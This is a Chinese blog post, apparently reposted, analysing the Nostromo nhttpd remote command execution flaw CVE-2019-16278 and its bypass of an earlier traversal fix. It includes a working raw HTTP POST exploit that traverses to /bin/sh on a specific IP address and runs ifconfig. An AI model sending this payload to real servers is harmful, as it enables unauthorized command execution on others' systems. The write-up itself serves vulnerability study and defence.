Nostromo Web服务器远程命令执行(CVE-2019-16278)

本文阅读 2 分钟

Nostromo web(又名nhttpd),这是一个开源的web服务,在Unix系统上非常流行,例如FreeBSD, OpenBSD等。

Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。 在CVE-2011-0751中攻击者可以通过/..%2f..%2f..%2fbin/sh来实现路径穿越,而后官方修复了该漏洞,CVE-2019-16278是对CVE-2011-0751的绕过,使用/.%0d./.%0d./.%0d./ 绕过对路径穿越的限制.

影响版本
Nostromo web<=1.9.6

在下图的函数http_verify()中,请求的首行会先进行解码,然后检查/../是否存在. img img 函数http_proc()会将首行传递给函数http_header() img 函数http_header()通过函数strcutl()解析数据 img 函数strcutl()的内部,会过滤字符串中的r(回车) img 最后,得到的路径是/../../../../bin/sh。

目录穿越完成后,在函数http_proc()中的execve()函数中,执行了rh->rq_filef(/../../../../bin/sh)。 img

POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1
Host: 113.108.70.111:50124
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36
Content-Length: 25

echo
echo
ifconfig 2>&1

img

参考: https://nosec.org/home/detail/3074.html https://github.com/jas502n/CVE-2019-16278

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/sycamorelg/article/details/117568374
-- 展开阅读全文 --
Web安全—逻辑越权漏洞(BAC)
« 上一篇 03-13
Redis底层数据结构--简单动态字符串
下一篇 » 04-10

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复